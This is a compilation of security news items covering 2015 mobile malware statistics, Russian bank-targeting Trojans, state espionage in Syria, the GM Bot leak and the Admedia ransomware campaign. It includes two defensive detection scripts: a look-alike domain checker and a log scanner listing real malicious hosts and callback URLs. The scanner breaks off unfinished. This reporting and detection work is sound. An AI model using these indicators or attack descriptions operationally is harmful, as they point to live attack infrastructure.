In early June, Trojan.IphoneOS.FakeTimer.a, a malicious program for iPhone, was detected. The Trojan targets users in Japan and can be installed on any iPhone because the attackers used an enterprise certificate to sign the Trojan. The malicious program uses phishing techniques to steal money. A similar version of the Trojan for Android – Trojan.AndroidOS.FakeTimer.a – has already been around for several years.
Statistics
In 2015, the volume of mobile malware continued to grow. From 2004 to 2013 we detected nearly 200,000 samples of malicious mobile code. In 2014 there were 295,539 new programs, while the number was 884,774 in 2015. These figures do not tell the whole story because each malware sample has several installation packages: in 2015, we detected 2,961,727 malicious installation packages.
From the beginning of January till the end of December 2015, Kaspersky Lab registered nearly 17 million attacks by malicious mobile software and protected 2,634,967 unique users of Android-based devices.
The number of attacks blocked by Kaspersky Lab solutions, 2015
The number of users protected by Kaspersky Lab solutions, 2015
Geography of mobile threats
Attacks by malicious mobile software were recorded in more than 200 countries.
The geography of mobile threats by number of attacked users, 2015
The number of recorded attacks greatly depends on the number of users in a country. To evaluate the danger of infection by mobile malware in various countries we calculated the percentage of our users who encountered malicious applications in 2015.
TOP 10 countries by the percentage of attacked users*

Rank  Country      % of attacked users**
1     China        37
2     Nigeria      37
3     Syria        26
4     Malaysia     24
5     Ivory Coast  23
6     Vietnam      22
7     Iran         21
8     Russia       21
9     Indonesia    19
10    Ukraine      19

* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** The number of attacked unique users as a percentage of all users of Kaspersky Lab mobile security products in the country.
China and Nigeria topped the ranking, with 37% of users of Kaspersky Lab mobile security products in those countries encountering a mobile threat at least once during the year. Most of the attacks on users in Nigeria were carried out by advertising Trojans such as the Ztrorg, Leech, and Rootnik families that make use of super-user privileges, as well as by adware.
In China, a significant proportion of the attacks also involved advertising Trojans, but the majority of users encountered the RiskTool.AndroidOS.SMSreg family. Careless use of these programs can lead to money being withdrawn from a mobile account.
Types of mobile malware
Over the reporting period, the number of new AdWare and RiskTool files detected grew significantly. As a result, their share in the distribution of new mobile malware by type also increased noticeably – from 19.6% and 18.4% to 41.4% and 27.4%, respectively.
Distribution of new mobile malware by type in 2014 and 2015
When distributing adware programs, rather primitive methods are used to attract the attention of users to the advertisements: apps are created using the icons and names of popular games or useful programs. Of course, there are lots of popular games and legitimate applications, so a lot of fake advertising apps can be generated. The more fake applications that are used, the more effective the monetization of click activity is. Yet another way of distributing adware is by embedding an advertising module in a legitimate application. This can be done by the author of the application as well as by those who want to make money by exploiting an app’s popularity: when the advertising module is embedded in a clean app without the author’s knowledge, the profits from advertising go to those who added the advert, not the author. Unlike fake apps, this complex app contains some useful functionality.
The growth in the volume of adware is caused by the increasing competition among developers of these programs. The legitimate programs that use various advertising modules are often too aggressive. Increasingly, advertising modules are delivering as much advertising as possible to the user in a variety of ways, including the installation of new adware programs. Sometimes the adware programs installed on a device can make it almost impossible to use because the user is constantly fighting with advertising windows.
RiskTool programs are especially popular in China. This is because SMS payments for content are very popular in the country. Almost any game that includes so-called internal purchases (for additional levels of a game, for example) contains an SMS payment module. In most cases, the user is notified about the potential risks associated with such purchases, but we also consider it necessary to inform our users about the risks. Because the games in question are popular, the number of RiskTool applications is constantly increasing. The main contributor to that growth was the RiskTool.AndroidOS.SMSReg family of programs.
Although AdWare and RiskTool programs do not cause direct harm to users, they can be very irritating, while RiskTool programs installed on mobile devices can lead to financial losses if used carelessly or manipulated by a cybercriminal.
The proportion of SMS Trojans in the overall flow of mobile threats decreased almost 2.4 times – from 20.5% to 8.7%. However, in 2015 we detected even more new SMS Trojans than in 2014. Activity by this type of malicious program dropped drastically in mid-2014. This was the result of an AoC (Advice-of-Charge) system being introduced by Russian operators that led to a reduction in the number of so-called affiliate programs distributing SMS Trojans, the majority of which targeted users in Russia.
Top 20 malicious mobile programs
Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare.
Name % of all attacked users*
1 DangerousObject.Multi.Generic 44.2
2 Trojan-SMS.AndroidOS.Podec.a 11.2
3 Trojan-Downloader.AndroidOS.Leech.a 8.0
4 Trojan.AndroidOS.Ztorg.a 7.6
5 Trojan.AndroidOS.Rootnik.d 6.9
6 Exploit.AndroidOS.Lotoor.be 6.1
7 Trojan-SMS.AndroidOS.OpFake.a 5.6
8 Trojan-Spy.AndroidOS.Agent.el 4.0
9 Trojan.AndroidOS.Guerrilla.a 3.7
10 Trojan.AndroidOS.Mobtes.b 3.6
11 Trojan-Dropper.AndroidOS.Gorpo.a 3.6
12 Trojan.AndroidOS.Rootnik.a 3.5
13 Trojan.AndroidOS.Fadeb.a 3.2
14 Trojan.AndroidOS.Ztorg.pac 2.8
15 Backdoor.AndroidOS.Obad.f 2.7
16 Backdoor.AndroidOS.Ztorg.c 2.2
17 Exploit.AndroidOS.Lotoor.a 2.2
18 Backdoor.AndroidOS.Ztorg.a 2.0
19 Trojan-Ransom.AndroidOS.Small.o 1.9
20 Trojan.AndroidOS.Guerrilla.b 1.8
* Percentage of users attacked by the malware in question, relative to all users attacked
First place is occupied by DangerousObject.Multi.Generic (44.2%), the verdict assigned to malicious programs detected by cloud technologies. Cloud detection comes into play when the local antivirus database contains neither a signature nor a heuristic for a malicious program, but the vendor's cloud already holds information about the object. This is essentially how the very latest malware is detected.
Trojan-SMS.AndroidOS.Stealer.a, which was the TOP 20 leader in 2014, came 28th in 2015.
Four places in the TOP 20 are occupied by Trojans whose main method of monetization is stealing money from mobile or bank accounts: Trojan-SMS.AndroidOS.Podec.a, Trojan-SMS.AndroidOS.OpFake.a, Trojan.AndroidOS.Mobtes.b and Backdoor.AndroidOS.Obad.f. Trojan-SMS.AndroidOS.Podec.a (11.2%) is in second place and remained among the three most widespread mobile threats throughout 2015. To recap, the latest versions of this Trojan no longer send paid text messages; it now focuses entirely on paid subscriptions, using CAPTCHA recognition to sign victims up. Trojan-SMS.AndroidOS.OpFake.a (5.6%) in 7th place is another long-term resident of the TOP 20: it finished 8th in 2014 and remained in the rating throughout 2015.
Yet another Trojan – Trojan-Ransom.AndroidOS.Small.o (1.9%) – blocks the victim’s phone and extorts money to unblock it. This mobile Trojan-Ransom program was very popular at the end of 2015 and became the only ransomware program to make the TOP 20. It first appeared in the ranking in the third quarter of 2015 in 11th place; it came 19th in the overall TOP 20 for 2015. The Trojan mostly spreads as a porn video player and targets Russian-speaking audiences.
More than half (12 out of 20) of the entries in the ranking are Trojans that use aggressive advertising as their primary means of monetization. They are Trojan-Downloader.AndroidOS.Leech.a, Trojan-Spy.AndroidOS.Agent.el, Trojan-Dropper.AndroidOS.Gorpo.a, Trojan.AndroidOS.Fadeb.a, and two modifications each of Trojan.AndroidOS.Guerrilla, Trojan.AndroidOS.Rootnik, Trojan.AndroidOS.Ztorg and Backdoor.AndroidOS.Ztorg. Unlike the usual advertising modules, these programs do not contain any useful functionality. Their goal is to deliver as many adverts as possible to the recipient by a variety of methods, including the installation of new advertising programs. These Trojans can use super-user privileges to hide themselves in the system folder, from where they are very difficult to remove. We have come across such Trojans before, mostly in China. There was a burst of activity by these programs in 2015: most of them targeted users in China, although they have started being actively distributed worldwide. The code of these Trojans often contained the word "oversea".
The other two places in the TOP 20 are occupied by Exploit.AndroidOS.Lotoor modifications used to obtain local super-user privileges.
Mobile banking Trojans
In 2015, we detected 7,030 mobile banking Trojans, roughly 2.4 times fewer than the 16,586 detected in 2014. Although the number of new samples fell from the previous year, these programs have become more capable and more dangerous, and the cybercriminals' areas of interest now include banks in numerous countries. Many mobile banking Trojans act independently, without any computer component, and target customers of dozens of banks around the world.
Number of mobile banking Trojans detected by Kaspersky Lab solutions in 2015
56,194 users were attacked by mobile banking Trojans at least once during the year.
Geography of mobile bankers
The number of attacked countries is growing: attacks by mobile banking Trojans were registered in 137 countries and territories worldwide, compared with 90 countries in 2014.
Geography of mobile banking threats in 2015 (number of users attacked)
Top 10 countries attacked by mobile banking Trojans (ranked by number of users attacked):
Country Number of users attacked
1 Russia 45690
2 Germany 1532
3 Ukraine 1206
4 US 967
5 Kazakhstan 804
6 Australia 614
7 South Korea 527
8 France 404
9 Belarus 380
10 Poland 324
As in the previous year, Russia topped the rating of countries attacked by mobile banking Trojans. Among the newcomers were South Korea, Australia, France and Poland. Lithuania, Azerbaijan, Bulgaria and Uzbekistan left the TOP 10.
Just how popular mobile banking Trojans are with cybercriminals in each country can be shown by the percentage of users who were attacked by these Trojans during the reporting period, relative to all attacked users.
TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users
Country % of all attacked users*
1 South Korea 13.8
2 Australia 8.9
3 Russia 5.1
4 Austria 3.0
5 Belarus 1.9
6 US 1.8
7 Tajikistan 1.7
8 Ukraine 1.6
9 France 1.6
10 Uzbekistan 1.6
* Percentage of users attacked by mobile banking Trojans, relative to all attacked users of Kaspersky Lab’s mobile security products in the country.
A substantial portion of mobile banking attacks in South Korea were caused by members of the Trojan-Banker.AndroidOS.Wroba family. These Trojans are designed to steal the mobile banking credentials of the largest Korean banks as well as mTANs (one-time transaction codes that banks deliver by SMS).
In Australia, the Trojan-Banker.AndroidOS.Acecard family was responsible for most infection attempts. This family is a new stage in the evolution of Backdoor.AndroidOS.Torec.a, the first Trojan for Android that made use of Tor. We detected this Trojan at the beginning of 2014, while the first banking modifications appeared in mid-2014. At that time the Trojan was distributed mainly in Russia, and only in 2015 did it begin to spread actively in Australia. One modification, which we detected in November 2015, is able to overlay the interfaces of 24 banking apps with a phishing window. Five of those apps belong to Australian banks, another four each belong to banks based in Hong Kong, Austria and New Zealand, three each to banks in Germany and Singapore, plus the PayPal app. In addition, there are modifications which target banks in the US and Russia.
Phishing windows of the Acecard Trojan
Stealing user logins and passwords by displaying a phishing window instead of the genuine app interface is not a new trick. We first came across it back in 2013 in Trojan-SMS.AndroidOS.Svpeng. In our IT threat evolution in Q1 2015 report we mentioned Trojan-SMS.AndroidOS.OpFake.cc which was capable of attacking at least 29 banking and financial apps. The latest modification of this Trojan can now attack 114 banking and financial apps. Its main goal is to steal the login credentials for bank accounts. It also overlays the windows of several popular mail applications.
In Russia, which ranked third in the TOP 10, Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher were the most popular programs used by attackers. Starting in April, we saw a sharp drop in the number of attempts to infect users with representatives of the Trojan-Banker.AndroidOS.Marcher family. During the five months from April to August, the number of attacks using this Trojan decreased fivefold. It is possible that the cybercriminals were preparing attacks on users in other countries during that time, because until September 2015 activity by this family was limited almost exclusively to Russia. From September, however, about 30% of the attacks using this Trojan targeted users in Australia, Germany and France.
The aforementioned Trojan-Spy.AndroidOS.SmsThief.fc was distributed in Russia. The attackers added their code to a genuine banking app without breaking its functionality, which makes this Trojan harder to detect.
Mobile Trojan-Ransom
In 2015, the number of Trojan-Ransom families doubled compared to 2014, and the number of modifications detected over the same period increased 3.5 times, to 6,924.
Over the reporting period, mobile ransomware attacked 94,344 unique users, five times more than in 2014 (18,478). The share of users attacked by Trojan-Ransom programs relative to all users attacked by mobile malware rose from 1.1% to 3.8% over the year.
Mobile ransomware attacks were registered in 156 countries and territories at least once during the year.
Geography of mobile ransomware threats in 2015 (number of users attacked)
TOP 10 countries attacked by Trojan-Ransom malware by the number of attacked users:
Country Number of attacked users
1 Russia 44951
2 Germany 15950
3 Kazakhstan 8374
4 US 5371
5 Ukraine 4250
6 UK 2878
7 Italy 1313
8 Spain 1062
9 Iran 866
10 India 757
Russia, Germany and Kazakhstan were the countries attacked most often by ransomware.
In Russia and Kazakhstan, the Trojan-Ransom.AndroidOS.Small family was most active, in particular the modification Trojan-Ransom.AndroidOS.Small.o, the most popular Trojan-Ransom program in 2015.
The Trojan-Ransom.AndroidOS.Pletor family also remained very popular in 2015. Interestingly, this first mobile encryptor Trojan was developed by the same group of cybercriminals as Trojan-Banker.AndroidOS.Acecard.
In Germany, Trojan-Ransom.AndroidOS.Fusob was the most actively distributed family.
Windows opened by the Fusob Trojan
The US came fourth in the ranking. The Trojan-Ransom.AndroidOS.Fusob family was especially popular in the country, although the Trojan-Ransom.AndroidOS.Svpeng family was also actively used.
This ranking depends to a large extent on the number of users in each country, so it is interesting to view a rating that shows the proportion of users attacked by Trojan-Ransom malware relative to all attacked users in the country.
TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country.
Country % of all attacked users*
1 Kazakhstan 15.1
2 Germany 14.5
3 US 10.3
4 Canada 8.9
5 Netherlands 8.8
6 UK 8.3
7 Switzerland 6.9
8 Austria 6.4
9 Ukraine 5.9
10 Australia 5.5
* Percentage of users attacked by Trojan-Ransom malware, relative to all attacked users of Kaspersky Lab’s mobile security products in the country
Russia, which accounted for the largest number of attacked users, was not in the TOP 10. The leaders of the ranking were Kazakhstan, Germany and the US.
Conclusion
Although the first advertising Trojans exploiting super-user privileges appeared a few years ago, their number grew substantially in 2015 and they began spreading rapidly. In the first quarter of 2015 the most widespread threats included just one Trojan of this type; by the end of the year these programs accounted for more than half of the TOP 20. They are distributed by every available means: via other advertising programs, via app stores, and even pre-installed on some devices. The number of advertising Trojans using super-user privileges will most likely continue to grow in 2016.
We have already seen cases when advertising Trojans were used to spread malicious mobile programs. There is every reason to believe that attackers will increasingly use these Trojans to infect mobile devices with malware.
We also came across cases where super-user privileges were utilized by other types of malware, especially ransomware.
Trojan-Ransom malware is likely to continue evolving in 2016. We expect the popularity of these programs among attackers to grow and their global reach to increase.
Another type of Trojan that we intend to continue monitoring closely in 2016 is Trojan-Banker. There are already lots of banking Trojans that do not require additional software on the victim’s computer. These Trojans operate independently, and only need to infect the user’s phone to steal his money. They are able to steal logins and passwords for mobile banking accounts by overlaying the legitimate banking app interfaces with a phishing window. The Trojans can also steal credit card data using phishing windows. In addition, they have functionality to intercept communications between a client and a bank – stealing incoming text messages and forwarding calls to the attacker. In 2016, banking Trojans will attack even more banking institutions and will use new distribution channels and new data theft technologies.
As the functionality of mobile devices and mobile services grows, the appetite of cybercriminals who profit from mobile malware will grow too. Malware authors will continue to improve their creations, develop new technologies and look for new ways of spreading mobile malware. Their main aim is to make money. In these circumstances, neglecting to protect your mobile devices is extremely risky.
Ratopak Trojan – Russian banks under attack
23.2.2016 Virus
Financially motivated actors have tricked employees of at least six Russian banks into installing the Ratopak Trojan; experts have found evidence of an extended hacking campaign.
According to security firm Symantec, a financially motivated cybercriminal gang has targeted employees of Russian banks.
The threat actors have been using a Trojan called Ratopak to gain control over the victim's machine and exfiltrate data. The experts have spotted several attacks since October. The attack chain starts with fake Central Bank employment emails sent to the staff of Russian financial institutions. To trick victims, the threat actors registered the domain cbr.com.ru, which resembles cbr.ru, the official domain of Russia's Central Bank.
The fake emails reference this domain, and the cybercriminals also use it to host the Ratopak Trojan.
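The cbr.com.ru trick works because "com.ru" is itself a public suffix, so cbr.com.ru is a completely different registrable domain from cbr.ru even though the brand label is identical. The following check, added here as an example and not taken from Symantec's report, resolves a sender address or URL to its registrable domain and flags hosts that carry a trusted brand label under some other registrable domain. The public-suffix subset, the sample addresses and the file paths are constructed; only cbr.ru and cbr.com.ru come from the article.

```python
"""Flag look-alike domains such as cbr.com.ru against a trusted list."""
from urllib.parse import urlparse

# Constructed subset of the Public Suffix List (https://publicsuffix.org/).
# A real deployment loads the full list; "com.ru" is what makes cbr.com.ru
# a different registrable domain from cbr.ru.
PUBLIC_SUFFIXES = {"ru", "com.ru", "net.ru", "org.ru", "com", "net", "org", "co.uk", "uk"}

# cbr.ru is the Central Bank of Russia's real domain, as named in the article.
TRUSTED_DOMAINS = {"cbr.ru"}


def host_of(value: str) -> str:
    """Extract a lower-cased hostname from an e-mail address, a URL or a bare host."""
    if "://" in value:
        return (urlparse(value).hostname or "").lower()
    if "@" in value:
        return value.rsplit("@", 1)[-1].lower()
    return value.lower()


def registrable_domain(host: str) -> str:
    """Return the public suffix plus one label.

    The longest matching suffix wins, so 'com.ru' beats 'ru' and
    cbr.com.ru is returned whole rather than being cut to 'com.ru'.
    """
    labels = host.rstrip(".").split(".")
    for i in range(len(labels) - 1):
        suffix = ".".join(labels[i + 1:])
        if suffix in PUBLIC_SUFFIXES:
            return ".".join(labels[i:])
    return host


def classify(value: str) -> str:
    """Return 'trusted', 'lookalike' or 'unrelated' for an address, URL or host."""
    host = host_of(value)
    if registrable_domain(host) in TRUSTED_DOMAINS:
        return "trusted"
    labels = set(host.split("."))
    # A trusted brand label inside a host whose registrable domain is NOT
    # trusted: cbr.com.ru, cbr.ru.example.com and similar constructions.
    for trusted in TRUSTED_DOMAINS:
        if trusted.split(".")[0] in labels:
            return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    # Constructed samples; only cbr.ru and cbr.com.ru appear in the article.
    for sample in ["hr@cbr.ru", "http://mail.cbr.ru/", "vacancy@cbr.com.ru",
                   "http://cbr.com.ru/buh/update.exe", "http://cbr.ru.example.com/",
                   "news@example.org"]:
        print(f"{sample:40} {classify(sample)}")
```

A mail gateway rule that only compares the visible "From" string to "cbr.ru" misses this case; comparing registrable domains does not, and the brand-label check additionally catches the classic "cbr.ru.<attacker-domain>" subdomain pattern.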
The Ratopak Trojan implements a number of backdoor features, including logging keystrokes and stealing clipboard data.
“Trojan.Ratopak was likely used because it can allow the attacker to gain control of the compromised computer and steal information. The threat can open a back door on the computer and allow the attacker to perform a variety of actions, including logging keystrokes, retrieving clipboard data, and viewing and controlling the screen. It can also be used to download other malicious files and tools. The narrow focus of the attacks and the use of Ratopak could be a hint to what the attackers were after.” states a blog post published by Symantec.
The malware is signed with stolen certificates, and the samples analyzed by Symantec were specifically built to target Russian or Ukrainian users.
“The threat also checks the language of the compromised computer. If it isn’t Russian or Ukrainian, then the malware stops its attack. Ratopak may also terminate and delete itself if it recognizes that it is being run on a virtual machine or a researcher’s computer.” continues the post.
Researchers said many of the infected computers had been running accounting and document management software designed to allow users to securely exchange documents with government organizations for tax purposes.
The malware experts at Symantec noticed software developed by the Russian company SBIS running on many of the infected machines. The SBIS application is an accounting program that the vendor's own URLs refer to as "buh" ("accountant" in Russian). The threat actors inserted the word "buh" into their own URLs so that their traffic would blend in with the traffic victims normally generate when using the SBIS software.
“A common link between several of the victims was a piece of software created by SBIS, a Russian company that develops, among other things, accounting and payroll applications. In URLs used by SBIS, their accounting software is referred to as “buh” (buh.sbis.ru/buh/ for example. “Buh” is the Russian term for accountant).” states Symantec “The attackers behind these attacks used “buh” in their URLs, knowing their victims would be running SBIS accounting software. By using this string in their URLs, the attackers can disguise their attack by making their activities look like normal traffic. This approach has led other researchers to label Trojan.Ratopak as “Buhtrap””
In April 2015, experts at ESET spotted a malware campaign dubbed Operation Buhtrap, a combination of the Russian word for accountant, "buhgalter", and the English word "trap". So far Buhtrap has not been seen anywhere else in the wild, so it is not likely to be widespread: approximately 88 per cent of targets were located in Russia and ten per cent in Ukraine. Analysts linked the campaign to the Anunak/Carbanak campaign, which also targeted Russian and Ukrainian banks.
“Although we believe it to be a different campaign, it shares some similarities with Anunak/Carbanak in terms of the techniques, tactics and procedures it uses.”
The modus operandi of these particular cybercriminals was associated with targeted attacks rather than cyber fraud, which makes their move to financial crime unusual. Their delivery method is email with an attached invoice document or a hoax contract.
Experts at Symantec confirmed their suspicions about the motivation of the attackers, who appear to be one of the Russian criminal rings specializing in attacks against banks and financial institutions.
“While there is no conclusive evidence of the attacker’s goal, the attacks appear to be financially motivated. The specificity of the targets−employees at certain banks using accounting software to send the government tax information−certainly points towards this goal,” states Symantec.
Other groups have recently targeted Russian banks; the best known are Carbanak and Anunak, which reportedly stole $1 billion from 100 banks worldwide. A few weeks ago Kaspersky uncovered the Carbanak 2.0 operation.
The experts at Kaspersky Lab discovered that the Carbanak cybergang is back and that other groups, including the Metel and GCMAN crews, are adopting similar APT-style techniques to steal money.
Russian Nation-state hackers intensify operations in Syria
23.2.2016 Hacking
According to security experts Russian nation-state hackers are behind cyber espionage campaigns against opposition groups and NGOs in Syria.
Russia is believed to be behind a cyber espionage campaign against Syrian opposition groups and NGOs; the Kremlin is reportedly running a PSYOP aimed at shaping sentiment in the country about the humanitarian crisis and diverting attention from its military operations in the area.
The Russian hackers target the most active human rights organizations and aid groups in the country, including the Syrian Observatory for Human Rights.
The experts have found many similarities with other operations by Russian nation-state actors, for example during the Ukrainian crisis.
Hackers used malware to compromise the targeted organizations and spread disinformation from victims’ official accounts.
Security experts at FireEye have collected evidence of Russian nation-state hacking activity against Syrian organizations. Richard Turner, head of Middle East and Europe at FireEye, said that the hacking activity of Russian entities had been intensifying since the start of the year.
“APT 28 and other Russian groups are now really focusing their attention on the collection of data on Syrian groups, particularly those focused on human rights and the monitoring of Russian military activity,” explained Turner. “It’s a very significant operation.” “Clearly this is to enable them to respond politically . . . to target [the groups] for information warfare and to have an impact on the conflict itself,”
The Financial Times reported on discussions with two senior intelligence officials who say that the Russian FSB directed the espionage campaign.
“Details of the Syrian campaign were discussed with two senior intelligence officials, one from Europe and one from a country neighbouring Syria. The operation was large in scale and systematic in nature, one of them said, speaking on condition of anonymity, adding that the campaign was directed by the FSB, Russia’s state security agency.” states a blog post on the Financial Times.
According to the intelligence officials, Russian hackers are also targeting organisations in Turkey that handle information about the Turkish government's involvement in the Syrian conflict. Russian hackers are collecting any kind of information on the Turkish government as relations between the two countries worsen.
Western intelligence is concerned about how events in Syria are developing; Western politicians believe that Russia has joined the fight against Isis in the country in order to support Bashar al-Assad's government against dissidents. Many organizations accuse the Russian forces in the area of attacks against civilians and opponents of the regime.
FireEye's experts found that the hackers launched spear-phishing campaigns against their targets and also used replicas of legitimate organisations' websites to track visitors and identify opponents of the regime.
“It could be for two reasons,” said Jens Monrad, global intelligence liaison at FireEye. “One is to send out false information from those groups, or they could be using their credentials as stepping stones to go on and target other individuals or organisations. It all fits with Russia’s traditional information warfare doctrine.”
GM Bot (Android Malware) Source Code Leaked Online
22.2.2016 Android
The source code of a recently discovered Android banking Trojan that has the capability to gain administrator access on your smartphone and completely erase your phone's storage has been LEAKED online.
The banking Trojan family is known by several names: security researchers from FireEye dubbed it SlemBunk, Symantec dubbed it Bankosy, and when Heimdal Security uncovered it last week, they dubbed it MazarBot.
All of the above waves of Android banking Trojans originate from a common family, dubbed GM Bot, which IBM has been tracking since 2014.
GM Bot emerged on Russian underground cybercrime forums, where it sold for $500 / €450, but it appears that someone who bought the code leaked it on a forum in December 2015, the IBM X-Force team reported.
What is GM Bot and Why Should You Worry about it?
The recent version of GM Bot (dubbed MazarBOT) can display phishing pages on top of mobile banking applications in an effort to trick Android users into handing their financial credentials to the fraudsters.
Besides this, the banking Trojan can also forward phone calls and intercept SMS messages, helping fraudsters bypass an additional layer of bank security, and lock the device's screen.
Cyber criminals could also use the malware to:
Spy on victims
Delete data from the infected device
Gain boot persistence to help survive device restart
Send and Read your SMS message
Make Calls to your contacts
Read the phone's state
Plague phone's control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device's storage (the most critical of the malware's capabilities)
According to the researchers, whoever leaked the source code did so only to boost their reputation on an underground forum.
GM Bot Android Malware Source Code for FREE
Yes, the source code for GM Bot and its control panel is now accessible to cybercriminals and fraudsters for FREE.
Here’s the Cherry on the Top:
Besides the source code, the leaker also posted a tutorial and server-side installation instructions, which means cybercriminals can create their own versions of the malware to conduct online banking fraud.
Although the archive containing the source code and its control panel is password protected, the leaker offered the password to active forum members who approached him.
"Those who received the password, in turn, passed it on to other, unintended users, so the actual distribution of the code went well beyond that discussion board’s member list," IBM cyber security evangelist Limor Kessem wrote in a blog post.
Online users had started sharing the password to the archive among their friends, and in no time, the GM Bot source code was all over the hacking underground forums.
GM Bot is one of the most dangerous banking Trojans in the Android ecosystem, and now that its source code has leaked, users are advised to be careful while banking online.
How to Protect Yourself?
As previously mentioned, users are advised to follow these steps to protect themselves against this kind of threat:
Never open attachments from unknown sources.
Never click on links in SMS or MMS messages sent to your phone.
Even if the email looks legit, go directly to the source website and verify any possible updates.
Go to Settings → Security and turn OFF the "Unknown sources" option (allow installation of apps from sources other than the Play Store).
Always keep an up-to-date Anti-virus app on your Android devices.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
NSA Data Center Experiencing 300 Million Hacking Attempts Per Day
22.2.2016 Hacking
Utah state computer systems are experiencing up to 300 million hacking attempts per day, apparently because of the National Security Agency's (NSA) data center in the state.
Yes, 300,000,000 hacking attempts in a day!
According to state officials, Utah's computer systems began to experience the surge in attacks a few years back, soon after the NSA revelations by whistleblower Edward Snowden.
The NSA built its new data center near the city of Bluffdale, Utah; since Snowden revealed the existence of the data center a couple of years ago, the attacks have continued constantly.
The NSA's PRISM surveillance program may have drawn hackers' attention to the state in retaliation for mass surveillance, fuelling the heightened attacks against the agency.
According to Utah Commissioner of public safety, Keith Squires, as quoted by KUTV:
"In 2010, my IT director was letting me know that the number of attacks we were averaging a day was between 25,000 to 80,000. We had peaks in the past year or so that were over 300,000,000 a day."
Additionally, the advanced weapons systems at Hill Air Force Base and the technology companies located in Utah could also be contributing to the volume of attacks.
TECHNICALITIES
Security officers traced the sudden influx of traffic to foreign IP ranges and described the pattern as consistent with a botnet attack.
Bots scan for vulnerabilities in exposed services in order to infect systems, following instructions from their Command and Control (C&C) infrastructure.
In an attempt to reduce the attack surface, Utah security officers blocked IP addresses from China, Russia and Indonesia.
In the majority of cases, attackers are probing with a variety of tactics for a single foothold that might lead them toward NSA systems.
As alarm bells ring at the NSA, a short note for the hackers: Big Brother is watching you, too.
Admedia attacks now rely also on Joomla to serve ransomware
22.2.2016 Virus
Operators running websites based on WordPress and Joomla should be aware of a spike in the number of compromised platforms used in Admedia attacks.
The threat actors behind the "Admedia attacks" are no longer targeting only WordPress; they are now showing increasing interest in Joomla. Experts at the Internet Storm Center (ISC) found the same actors behind a campaign targeting Joomla-hosted sites.
In early February, experts at Sucuri reported a spike in compromised WordPress sites generating hidden iframes whose URLs pointed to domains hosting an exploit kit. The Sucuri researchers observed the string "admedia" in most of the URLs generated by the iframes.
“These “admedia” URLs act as a gate between the compromised website and the EK server. EK traffic associated with this campaign has generally sent TeslaCrypt ransomware. However, characteristics of this campaign have evolved since Sucuri’s original blog post.” states an analysis published by the Internet Storm Center (ISC).
The campaign is evolving. On Wednesday 2016-02-17, Brad Duncan, a security researcher at Rackspace, documented the new attack chain: a compromised website generated an admedia gate, which led to Angler EK, which in turn served TeslaCrypt to vulnerable machines. The experts also noted that the crooks behind the admedia attacks, who initially relied on the Nuclear exploit kit, have now added the Angler exploit kit.
Analysis of the traffic generated by the infection chain allowed the ISC to identify the following components:
178.62.122.211 – img.belayamorda.info – admedia gate
185.46.11.113 – ssd.summerspellman.com – Angler EK
192.185.39.64 – clothdiapersexpert.com – TeslaCrypt callback traffic
The compromised websites generate the admedia gate through injected malicious scripts.
“As the Sucuri blog already reported, each .js file returned by the compromised site had malicious script appended to it. In a case on 2016-02-15, I also saw the same type of script included in an HTML page from the compromised website; however, today’s traffic only shows injected script in the .js files.” Duncan wrote.
The captured traffic also shows that the attackers have started using "megaadvertize" in their gateway URLs instead of "admedia".
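The three IP/host pairs listed above map onto the three stages of the chain (gate, exploit kit, ransomware callback), and the two gate keywords are the only URL-level indicator that survives when the actors rotate gate hosts. The following script, added here as an example and not part of the ISC write-up, runs those indicators over web-proxy log lines and reports, per client, how far along the chain each host got. The log format and every log line are constructed; the indicators and keywords are the ones named in the article.

```python
"""Spot the admedia/megaadvertize infection chain in web-proxy logs."""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Indicators named in the ISC analysis, grouped by stage of the chain.
IOC_BY_STAGE = {
    "gate":     {"178.62.122.211", "img.belayamorda.info"},
    "angler":   {"185.46.11.113", "ssd.summerspellman.com"},
    "callback": {"192.185.39.64", "clothdiapersexpert.com"},
}
# Both strings the campaign has used in its gate URLs so far.
GATE_KEYWORDS = re.compile(r"admedia|megaadvertize", re.IGNORECASE)

# Constructed log format: "<timestamp> <client_ip> <dest_ip> <method> <url> <status>"
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(GET|POST)\s+(\S+)\s+(\d{3})$")


def stage_of(dest_ip: str, url: str):
    """Map one request to a chain stage, or None if it matches nothing."""
    host = (urlparse(url).hostname or "").lower()
    for stage, iocs in IOC_BY_STAGE.items():
        if dest_ip in iocs or host in iocs:
            return stage
    # Unknown gate host, but the campaign's URL keyword: still a gate hit.
    if GATE_KEYWORDS.search(url):
        return "gate"
    return None


def analyse(lines):
    """Return (stages_per_client, verdict_per_client) for an iterable of log lines."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # ignore lines that do not match the expected format
        _ts, client, dest, _method, url, _status = m.groups()
        stage = stage_of(dest, url)
        if stage and stage not in seen[client]:
            seen[client].append(stage)

    verdicts = {}
    for client, stages in seen.items():
        if "callback" in stages:
            verdicts[client] = "infected: TeslaCrypt callback observed"
        elif "angler" in stages:
            verdicts[client] = "exploit kit reached: triage the host"
        else:
            verdicts[client] = "gate only: chain did not complete"
    return dict(seen), verdicts


# Constructed sample log: 10.0.0.5 walks the whole chain, 10.0.0.7 only
# touches a keyword-matched gate on an unknown host, 10.0.0.8 is clean.
SAMPLE_LOG = """\
2016-02-17T14:02:11Z 10.0.0.5 178.62.122.211 GET http://img.belayamorda.info/admedia/?id=9f3 200
2016-02-17T14:02:13Z 10.0.0.5 185.46.11.113 GET http://ssd.summerspellman.com/topic/85621.html 200
2016-02-17T14:02:40Z 10.0.0.5 192.185.39.64 POST http://clothdiapersexpert.com/wp-content/plugins/a.php 200
2016-02-17T14:05:02Z 10.0.0.7 203.0.113.9 GET http://cdn.unknown-host.test/megaadvertize/?a=1 200
2016-02-17T14:06:30Z 10.0.0.8 198.51.100.2 GET http://news.example.test/index.html 200
""".splitlines()

if __name__ == "__main__":
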